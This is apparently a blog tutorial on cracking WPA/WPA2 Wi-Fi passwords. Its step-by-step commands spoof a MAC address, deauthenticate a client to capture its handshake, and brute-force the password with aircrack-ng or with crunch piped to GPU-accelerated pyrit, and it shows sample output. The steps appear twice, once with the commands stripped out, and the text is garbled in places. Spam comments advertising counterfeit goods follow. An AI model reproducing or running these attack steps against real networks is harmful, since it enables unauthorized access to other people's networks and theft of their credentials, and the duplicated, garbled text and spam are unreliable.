WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
Rules to Follow
- A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
- here a link to download it http://www.backtrack-linux.org/downloads/
- A nearby WEP-enabled Wi-Fi network
- Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
Steps to Follow:
Step 1 :
The result will be something like :
Step 2 :
Step 3 (Optional) :
Change the mac address of the mon0 interface.
Step 4 :
Then, press "
Step 5 :
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
Download crunch 3.0 (the current version at the time of this writing).
*where
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
The result will be something like :
Step b :
Step c (Optional) :
Change the mac address of the mon0 interface.
Step d :
Then, press "
Step e :
Step f :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
Step h :
Go to the official site of crunch.
Download
Step i :
Go to the official site of pyrit.
Download
Step j :
*where
Step k (Optional) :
If you encounter error when reading the
*where
Step l :
Then, you will see something similar to the following.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
Open another terminal.
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b :
airmon-ng start wlan0
Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d :
airodump-ng mon0
Then, press "
Ctrl+c
" to break the program.Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download
crunch 3.0
(the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list
Download
pyrit
and cpyrit-cuda
(the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step k (Optional) :
If you encounter error when reading the
wpacrack-01.cap
, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where
8 16
is the length of the password, i.e. from 8 characters to 16 characters.Step l :
Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0
Make sure pyrit workable on your system :
That's all! See you. THANKS YOU AND plz follow me in blog.............
pyrit list_cores
That's all! See you. THANKS YOU AND plz follow me in blog.............
4 Comments
gucci,borse gucci,gucci sito ufficiale,gucci outlet
ReplyDeletenike free 5.0
coach outlet online
oakley outlet
cheap nike shoes
salomon shoes
san antonio spurs jerseys
ray ban sunglasses
coach outlet online
coach outlet
polo lacoste pas cher
nike air max uk
ugg boots, http://www.cheapuggboots.net.co
mcm handbags
hollister clothing
pandora
cleveland cavaliers jersey
true religion outlet, http://www.truereligionoutletstore.us.com
kobe shoes
oakley sunglasses, http://www.oakleysunglassesdiscount.us.com
chicago bears jerseys
mbt shoes
ralph lauren
oakley sunglasses, http://www.oakleysunglasses-outlet.us.com
nike roshe run
swarovski crystal
oakley,occhiali oakley,oakley italia,oakley occhiali,oakley sunglasses
michael kors outlet
the north face uk
thomas sabo uk
timberland shoes
michael kors outlet online, http://www.michaelkorsoutletonlinstore.us.com
puma sneakers
gucci handbags
true religion outlet, http://www.truereligionjean.in.net
2015826caihuali
barcelona jersey
ReplyDeletelouis vuitton bags
coach outlet
air jordan 11
air jordan shoes
fred perry sale
lululemon outlet
tory burch shoes
lacoste shirts
fitflop shoes
coach factory outlet
asics running shoes
insanity
oakley sunglasses, http://www.oakleysunglassescanada.com
new balance 574
lululemon outlet, http://www.yogapants.us.com
coach outlet
michael kors outlet, http://www.michaelkorsoutlet-store.us.com
valentino shoes
los angeles clippers jerseys
louis vuitton,borse louis vuitton,louis vuitton sito ufficiale,louis vuitton outlet
michael kors outlet
salvatore ferragamo
cheap oakley sunglasses
cheap soccer jerseys
minnesota vikings jerseys
longchamp handbags
ray ban sunglasses
ray ban
true religion outlet, http://www.truereligionjeansoutlet.com
nhl jerseys
ugg boots, http://www.uggsoutlet.us.org
ralph lauren outlet
miami dolphins jerseys
burberry outlet, http://www.burberryoutletonlinestore.com.co
2015826caihuali
baltimore ravens
ReplyDeleteugg boots on sale
louis vuitton uk
abercrombie fitch
ray ban sunglasses outlet,ray ban sunglasses,ray ban,rayban,ray bans,ray ban outlet,ray-ban,raybans,ray ban wayfarer,ray-ban sunglasses,raybans.com,rayban sunglasses,cheap ray ban
canada goose sale
louis vuitton bags on sale
pandora charms
north face jackets,north face,the north face,northface,north face outlet,north face jackets clearance,the north face
supra footwear
rolex watches
snow boots outlet
nike air max 90
ugg boots
polo ralph lauren uk
ugg uk outlet
ysl outlet online
barbour uk
michael kors outlet store
coach outlet store online,coach outlet store,coach outlet
michael kors handbags
chicago bulls
giuseppe zanotti sale
michael kors usa
michael kors outlet store
ray ban sale
tiffany jewelry
true religion outlet,true religion jeans,true religion kids,true religion jeans sale,true religion jeans for men,true religion jacket,true religion sale
pandora outlet
nba jerseys wholesale
ddd1105
michael kors outlet
ReplyDeletecoach outlet store
louis vuitton handbags
snow boots outlet
coach outlet
longchamp outlet
true religion jeans
nfl jerseys wholesale
hollister clothing
ugg outlet
burberry outlet
swarovski outlet
ferragamo outlet
michael kors online outlet
fitflops sale clearance
ferragamo shoes